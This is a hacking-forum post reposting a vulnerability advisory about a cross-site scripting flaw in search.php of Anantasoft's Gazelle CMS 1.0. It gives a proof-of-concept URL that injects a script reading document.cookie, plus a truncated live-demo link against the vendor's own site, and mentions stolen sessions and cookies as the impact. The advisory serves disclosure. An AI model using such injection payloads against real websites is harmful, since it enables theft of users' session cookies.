Devilzc0de Forum Follow @devilzc0de
  • Home
  • Hacking
  • Networking
  • Programming
  • O.S
  • Server
  • Tweets
  • Search
  • Member List
  • Calendar
Current time: 05-20-2013, 08:03 AM Hello There, Guest! (Login — Register)
Devilzc0de Forum › Information Technology › Hacking › Exploit v
« Previous 1 ... 10 11 12 13 14 15 Next »

Xss Attack Anantasoft's Gazelle CMS 1.0

Home General Computer Multimedia Business Lounge

Post Reply 
Tweet
Threaded Mode | Linear Mode
Xss Attack Anantasoft's Gazelle CMS 1.0
07-13-2010, 06:26 PM
Post: #1
ghostblup Offline
./Devilz 1st Cadet
Posts: 8
Joined: Jul 2010
Reputation: 1
Xss Attack Anantasoft's Gazelle CMS 1.0
------------------------------------------------------------------------
[ghostblup|adv02] Anantasoft's Gazelle CMS 1.0
------------------------------------------------------------------------

Author : ghostblup
Date : September, 3 th 2009
Location : Palembang, Indonesia
my blog : http://www.ghostblup.blogspot.com
Impact : Exposure of sensitive information
------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Anantasoft's Gazelle CMS
version : <= 1.0
Vendor : http://www.anantasoft.com/
Download : http://sourceforge.net/projects/ananta/
License : GNU General Public License (GPL)

------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~

Critical Cross-site scripting (XSS).
search.php is not in the filter that allows XSS
/ session/cookies stolen

Poc/Exploit:
~~~~~~~

http://www.example.com.my/[path]/search.php?lookup=%3Cscript%3Ealert(document.cookie)%3B%3C%2Fscript%3E

Demo Live:
~~~~~~~

http://www.anantasoft.com/search.php?loo...Fscript%3E

Dork:
~~~
Google : N/A


Solution:
~~~~~
- Edit the source code to ensure that input is properly verified.

---------------------------------------------------------------------------

Shoutz:
~~~~~
~ My Love : Ratih Permata Sari
~ My friends : Amy,suset,revi,uwix^_^, Blackgirl ,
jasakreativkomputer, cyberlau, Vldaz, _persona

~ My inspiration : K-159 , y3dips,az001,Hero
~ ngetem community, sayap community , echo.or.id , PalComTech.com
~ #ngetem #mr_green #sayap #kegelapan @irc.allnetwork

------------------------------------------------------------------------
Contact:
~~~~~~

ghostblup@gmail.com

My Blog: http://www.ghostblup.blogspot.com
~~~~~~~~~~~~~~~~~~~~~end~~~~~~~~~~~~~~

Source : http://packetstormsecurity.org/0909-expl...ms-xss.txt
Find all posts by this user
Quote this message in a reply
« Next Oldest | Next Newest »
Post Reply 


Topic Tools
Topic Link :
BBCode :
HTML Code :
View a Printable Version Send Thread to a Friend Subscribe to this thread
Submit Google Submit Face book Submit to Digg Submit to Reddit Submit to Furl Submit to Del.icio.us Submit to Jeqq

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
  XSS attack on HARVARD.EDU aciz a.k.a n1nj4 10 250 01-20-2012 06:35 PM
Last Post: chiboga
  Xss attack phpmyadmin for windows 2.5.9 ghostblup 0 61 07-13-2010 06:23 PM
Last Post: ghostblup
  DNS attack kiddies 2 105 01-23-2010 10:10 AM
Last Post: djphantomx

Users Browsing
1 Guest(s)

  • Contact Us
  • devilzc0de
  • Return to Top
  • Mobile Version
  • RSS Syndication
  • Help
Current time: 05-20-2013, 08:03 AM Powered By MyBB, © 2002-2013 MyBB Group. Theme created by Justin S. | Mixed By Chaer.Newbie | Fixed By Aditya

USING THIS SITE INDICATES THAT YOU HAVE READ AND ACCEPT OUR TERMS. IF YOU DO NOT ACCEPT THESE TERMS, YOU ARE NOT AUTHORIZED TO USE THIS SITE